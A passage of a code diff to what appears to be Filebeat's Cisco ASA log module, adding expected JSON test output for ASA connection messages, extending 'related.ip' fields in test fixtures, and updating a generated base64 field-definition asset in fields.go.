"10.10.10.10", @@ -1603,6 +1619,156 @@ "forwarded" ] }, + { + "cisco.asa.destination_interface": "net", + "cisco.asa.message_id": "302022", + "cisco.asa.source_interface": "fw1111", + "destination.address": "192.168.2.2", + "destination.ip": "192.168.2.2", + "destination.port": 10051, + "event.action": "firewall-rule", + "event.category": [ + "network" + ], + "event.code": 302022, + "event.dataset": "cisco.asa", + "event.kind": "event", + "event.module": "cisco", + "event.original": "%ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "event.severity": 6, + "event.timezone": "-02:00", + "event.type": [ + "info" + ], + "fileset.name": "asa", + "host.hostname": "dev01", + "input.type": "log", + "log.level": "informational", + "log.offset": 4472, + "network.iana_number": 6, + "network.transport": "tcp", + "observer.egress.interface.name": "fw1111", + "observer.hostname": "dev01", + "observer.ingress.interface.name": "net", + "observer.product": "asa", + "observer.type": "firewall", + "observer.vendor": "Cisco", + "related.hosts": [ + "dev01" + ], + "related.ip": [ + "10.10.10.10", + "192.168.2.2" + ], + "service.type": "cisco", + "source.address": "10.10.10.10", + "source.ip": "10.10.10.10", + "source.port": 38540, + "tags": [ + "cisco-asa", + "forwarded" + ] + }, + { + "cisco.asa.destination_interface": "net", + "cisco.asa.message_id": "302022", + "cisco.asa.source_interface": "fw111", + "destination.address": "192.168.2.2", + "destination.ip": "192.168.2.2", + "destination.port": 10051, + "event.action": "firewall-rule", + "event.category": [ + "network" + ], + "event.code": 302022, + "event.dataset": "cisco.asa", + "event.kind": "event", + "event.module": "cisco", + "event.original": "%ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "event.severity": 6, + "event.timezone": "-02:00", + "event.type": [ + "info" + ], + "fileset.name": "asa", + "host.hostname": "dev01", + "input.type": "log", + "log.level": "informational", + "log.offset": 4631, + "network.iana_number": 6, + "network.transport": "tcp", + "observer.egress.interface.name": "fw111", + "observer.hostname": "dev01", + "observer.ingress.interface.name": "net", + "observer.product": "asa", + "observer.type": "firewall", + "observer.vendor": "Cisco", + "related.hosts": [ + "dev01" + ], + "related.ip": [ + "10.10.10.10", + "192.168.2.2" + ], + "service.type": "cisco", + "source.address": "10.10.10.10", + "source.ip": "10.10.10.10", + "source.port": 38540, + "tags": [ + "cisco-asa", + "forwarded" + ] + }, + { + "cisco.asa.destination_interface": "net", + "cisco.asa.message_id": "302022", + "cisco.asa.source_interface": "fw111", + "destination.address": "192.1682.2.2", + "destination.domain": "192.1682.2.2", + "destination.port": 10051, + "event.action": "firewall-rule", + "event.category": [ + "network" + ], + "event.code": 302022, + "event.dataset": "cisco.asa", + "event.kind": "event", + "event.module": "cisco", + "event.original": "%ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051)", + "event.severity": 6, + "event.timezone": "-02:00", + "event.type": [ + "info" + ], + "fileset.name": "asa", + "host.hostname": "dev01", + "input.type": "log", + "log.level": "informational", + "log.offset": 4791, + "network.iana_number": 6, + "network.transport": "tcp", + "observer.egress.interface.name": "fw111", + "observer.hostname": "dev01", + "observer.ingress.interface.name": "net", + "observer.product": "asa", + "observer.type": "firewall", + "observer.vendor": "Cisco", + "related.hosts": [ + "dev01", + "192.1682.2.2" + ], + "related.ip": [ + "10.10.10.10" + ], + "service.type": "cisco", + "source.address": "10.10.10.10", + "source.ip": "10.10.10.10", + "source.port": 38540, + "tags": [ + "cisco-asa", + "forwarded" + ] + }, { "cisco.asa.destination_interface": "net", "cisco.asa.message_id": "302023", diff --git a/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json index 70df45cbf91..6fd963a6037 100644 --- a/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json @@ -36,6 +36,9 @@ "target.destination.hostname.local", "Prod-host.name.addr" ], + "related.ip": [ + "10.0.55.66" + ], "service.type": "cisco", "source.domain": "Prod-host.name.addr", "source.nat.ip": "10.0.55.66", diff --git a/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json index b2c1d4cb876..33d9e610b24 100644 --- a/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json @@ -451,6 +451,7 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.222", + "192.0.2.43", "10.123.1.35" ], "service.type": "cisco", @@ -554,7 +555,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.1", - "10.123.3.42" + "10.123.3.42", + "10.123.3.130" ], "service.type": "cisco", "source.address": "192.0.2.1", @@ -812,7 +814,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.0.17", - "192.168.3.42" + "192.168.3.42", + "10.0.0.130" ], "service.type": "cisco", "source.address": "192.0.0.17", @@ -3335,6 +3338,7 @@ ], "related.ip": [ "10.1.1.45", + "192.88.99.1", "192.88.99.129" ], "server.domain": "bad.example.com", @@ -3393,6 +3397,7 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", + "10.2.1.1", "192.0.2.223" ], "service.type": "cisco", @@ -3450,6 +3455,7 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", + "10.2.1.1", "192.0.2.223" ], "service.type": "cisco", diff --git a/x-pack/filebeat/module/cisco/fields.go b/x-pack/filebeat/module/cisco/fields.go index 4d465edfa97..1365580900a 100644 --- a/x-pack/filebeat/module/cisco/fields.go +++ b/x-pack/filebeat/module/cisco/fields.go @@ -19,5 +19,5 @@ func init() { // AssetCisco returns asset data. // This is the base64 encoded gzipped contents of module/cisco. func AssetCisco() string { - return "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